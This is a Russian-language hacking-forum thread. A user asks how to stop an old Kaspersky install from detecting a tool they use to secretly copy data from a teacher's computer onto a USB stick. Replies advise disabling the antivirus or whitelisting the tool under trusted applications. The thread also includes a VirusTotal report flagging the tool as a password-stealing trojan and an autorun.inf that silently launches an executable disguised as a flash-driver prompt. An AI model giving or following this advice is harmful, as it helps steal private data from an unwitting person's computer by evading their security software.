Форум АНТИЧАТ - Проблема со старым каспером

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - Проблема со старым каспером (https://forum.antichat.xyz/showthread.php?t=123184)

Проблема со старым каспером

Есть 2 программы для скрытого копирования данных с компа на флешку. Вот они
http://yassnov.narod.ru/
http://www.digiseller.net/info.php?idd=743412 - эта прога кстати платная, но выложить ее я могу если кому нужна
Новые Nod32 и Kav с новыми базами на них и их работу не ругаяются. Однако старый каспер сегодня при попытке скопировать данные 2-ой прогой с компа препода завизжал. Можно как-нибудь каспера отключить? Версию к сожалению не знаю... Да и времени разбираться нет, экзамены на носу.... может кто-нибудь что посоветовать?

Конечно в нём...
100% выход-вырубить каспер :)

Цитата:

Сообщение от .Varius

Конечно в нём...
100% выход-вырубить каспер :)

Это далеко не решение проблемы. TC попробуй "руками" удалить файл. Или скачай dr.web cuir it (не помню точное название, но на сайте найдешь). Прога бесплатная, предназначенная для сканирования системы

Проанализировал через вирустотал

PHP код:


		
			
a-squared    4.0.0.101    2009.06.01    Trojan-PWS.Win32.Agent.qx!IK

AhnLab-V3    5.0.0.2    2009.06.01    -

AntiVir    7.9.0.180    2009.06.01    -

Antiy-AVL    2.0.3.1    2009.06.01    -

Authentium    5.1.2.4    2009.06.01    -

Avast    4.8.1335.0    2009.05.31    -

AVG    8.5.0.339    2009.06.01    -

BitDefender    7.2    2009.06.01    -

CAT-QuickHeal    10.00    2009.06.01    -

ClamAV    0.94.1    2009.06.01    -

Comodo    1229    2009.06.01    -

DrWeb    5.0.0.12182    2009.05.29    -

eSafe    7.0.17.0    2009.06.01    Suspicious File

eTrust-Vet    31.6.6533    2009.06.01    -

F-Prot    4.4.4.56    2009.06.01    -

F-Secure    8.0.14470.0    2009.06.01    -

Fortinet    3.117.0.0    2009.06.01    -

GData    19    2009.06.01    -

Ikarus    T3.1.1.57.0    2009.06.01    -

K7AntiVirus    7.10.749    2009.05.29    -

Kaspersky    7.0.0.125    2009.06.01    -

McAfee    5633    2009.06.01    -

McAfee+Artemis    5633    2009.06.01    -

McAfee-GW-Edition    6.7.6    2009.05.29    -

Microsoft    1.4701    2009.06.01    -

NOD32    4120    2009.06.01    -

Norman    6.01.05    2009.06.01    -

nProtect    2009.1.8.0    2009.06.01    -

Panda    10.0.0.14    2009.06.01    -

PCTools    4.4.2.0    2009.06.01    -

Prevx    3.0    2009.06.01    Medium Risk Malware

Rising    21.32.04.00    2009.06.01    -

Sophos    4.42.0    2009.06.01    -

Sunbelt    3.2.1858.2    2009.05.31    -

Symantec    1.4.4.12    2009.06.01    W32.Kitro.Gen

TheHacker    6.3.4.3.335    2009.06.01    -

TrendMicro    8.950.0.1092    2009.06.01    -

VBA32    3.12.10.6    2009.05.31    -

ViRobot    2009.6.1.1763    2009.06.01    -

VirusBuster    4.6.5.0    2009.05.31    -

Вирус нашли неизвестные для меня антивирусы... Названия первый раз вижу. М.б. это и не вирус вовсе?

X-RayBlade, дело пока не в том, чтобы удалить вирус, а втом, чтобы каспер на компе препода при следующей попытке не заорал

Это программы которые определяются как хакерские. Если они работают на тебя - ничего плохого в этом нет. Просто антивирусам это не нравиться. У самого каспер стоял давно, но зайди в настройки каспера и найди там пункт (меню, вкладку) "доверенные приложения". Там укажи путь в эту дирректорию(можно и сами файлы). Т.е. теперь когда файлы будут запускаться (ну или из указаной папки) то каспер на твоем (или на настроенном компе, если настраивал не только у себя) ругаться перестанет. Удачи ;)

Сегодня нод у друга ругнулся вот на это.

PHP код:


		
			
[autorun] 

UseAutoPlay=1 

shellexecute=Flashdriver.EXE



action=Запустить с поддержкой флеш-драйверов

action=@Flashdriver.EXE 

label=Flash8Gb

icon=open.ico

Shell\cmd1=Запустить с поддержкой флеш-драйверов

Shell\cmd1\Command = Flashdriver.EXE

М.б. это из автоплея? Никто в этом не рулит?